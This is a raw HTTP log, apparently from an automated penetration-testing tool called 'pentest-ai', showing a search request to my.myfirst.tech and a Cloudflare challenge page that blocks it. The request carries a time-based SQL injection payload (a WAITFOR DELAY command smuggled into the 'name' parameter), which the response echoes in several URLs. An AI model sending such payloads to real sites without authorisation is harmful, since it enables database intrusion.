REQUEST:
GET https://my.myfirst.tech/search?name=1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9362
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c84747196ca110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=3c8KofNQL%2B3qCNpl8IEc%2FPw2QOlB6LiMzXawDbfgBpT5The7HrDxAuQNIH0xW735zIeqoTTA9sXVt%2B7D7hEKHummz9bRpBrLvTjMSYWn9jqtC2dknoP6FFrn17VJiF%2FGJg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c84747196ca110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'RMDgUEgvZ.HFFDTnXs26bVVwzS7dos7dXoPgGYWwak8-1784281155-1.2.1.1-1B8bhbR8YHHRRPIiY84QmHQvOgsfA0OcuWWYdEao.20jkOh7IkVcIgEVnKjcT7E_',cITimeS: '1784281155',cRay: 'a1c84747196ca110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?name=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--\u0026__cf_chl_tk=ubrOLiN8CIzzOaQlPD0Y02_ON4luaKUJbwuZYmrqTeU-1784281155-1.0.1.1-oW7f0QtX69HIdt7HyzYwK.Vg0saASuuWSZbPCJFUulE",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?name=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--\u0026__cf_chl_f_tk=ubrOLiN8CIzzOaQlPD0Y02_ON4luaKUJbwuZYmrqTeU-1784281155-1.0.1.1-oW7f0QtX69HIdt7HyzYwK.Vg0saASuuWSZbPCJFUulE",md: 'VtZp_M1Wofa3cCVDZOHwilPnDoBQVbaolKp0VrWXZTM-1784281155-1.2.1.1-JiPHLzVHrAPDSICd1POZ3po6d7Cec92fKLGDjvxzyDMCkCiyA4RwctYRWepAXH83iTeuX1JWImo3lE.qtswjg99ljHvjJyblp419J58D.YrZj4LhmzK_5m1rfBvzU_uUcrn_OcM.20rOnaUNTJO69mX8tTS8kH9776kRXZX1X7s6mq08Kz4pTFvvjjbV1TsB4nNIUxeDz4_WWuQj2AV843L9Mxa5YZAjZwSEbPtCc4SxKzabuWVaAUtEf1.rUzcdBJNJ6oEdaJ7wgVCEMsCkpWnFKGqflCukvIjy1axlF4A13L3Z.PCkjuB7T5IwttPa3WrZ9apTinZA5ACQEEnWZxpHxbLk2H1aDwL3pGjhlcxi2qEnauJDt4.JmddfCTmazdLzD8F9V8B8p_uc9GesC6uiRNumOnnSfbVAEhO7RfHeCOhaFaZYKEG5ZR2vkP7G41W0n3lj1o3K3_b.uTcwmXpKqsqLqUmp0xarai7G5N5NrZHDhuWXN9b.3ULdBbGri7f5g0.fkg1NQFRtD.oDbut155eJgdHX.Q0KIdTjWI.bmkSu6zK9z7c75PBf6tme.gxoWFCG7DhrJGs0ZZhs18ItHm9X0GfvBx6FlfizGyvAxTD2.xSV0BDatgI3OXBnJGOZTYNo25Ocg2884Kxd014fkT7TT9aT2BZ.PaQCA34xaocO5.U3Q6H7M4UPc5vHktDz7t15sXLXcy6pGapTGa6bPnkCWCuCaohgPROhWDfwXpCuGDOgwddA2_e36fIvFQW1rXMg5z4zUh5QezPBt2rBYymMqYJL9nU8lhNSzlqV_R0NYHxvXD5p3LiErWhO9zMEoWaYDdS9sIaEWA_SjQvwiLiU.oUFq_QaytUrPc5lxKc_g42VikGzmSEo6mr3_aaLUtuO_OiFtQbWbHMLg8QXNhk833aQRs1IngKIH8XBAuuQSorR83Lxe9ILHxi0zvxK7FNvLlRnkJdA88XUcVvVreRyix07EH4NHe7Q2Vye9BPHUXEjAXhCmdz_R9rGQBP66QGDHDW85_wZBD.dQAbzMs3bs42bFTzuw9v24k6OZfccU6Gb5G6KeYaaMk9mmLq5CE1m6AcUB_l2dWSgWtZj_VGK2T7.37kfgEEDrErfi9o3J0FGc8FK8By_2Rb_i78kgoCyCqGLJuzR8lkiUP1_x1ucB_RPeAbCo66GD.k',mdrd: 'BfjEWgKorAMD5niU_rPVaOrSiY5hUZyIX6Oqh0x_BIs-1784281155-1.2.1.1-ipZTA1hYwzQ1mI.rFzJ6gTT.1x1M6hz6.hZya4QK3tQeouSzyJ84330IgJ713Hyh9bXqjx92eCz9CYZDFIR7ivVi0DBBEtK_ScTEpsJN8jPbtEN2CC5fshhV5l.rPAyJ3eyKHfLV.X9jyAQ4YVMyGivoavuJL9WbDjKQkNavs8EnNe1pSlpvquvAuVhce8RAehrkQnO9fl6xcibRGC.9IhQEs0ebGK6lgAUQXIxFVn4aOEtc6GYiKEriFpRN.usA',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c84747196ca110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?name=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--\u0026__cf_chl_rt_tk=ubrOLiN8CIzzOaQlPD0Y02_ON4luaKUJbwuZYmrqTeU-1784281155-1.0.1.1-oW7f0QtX69HIdt7HyzYwK.Vg0saASuuWSZbPCJFUulE"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
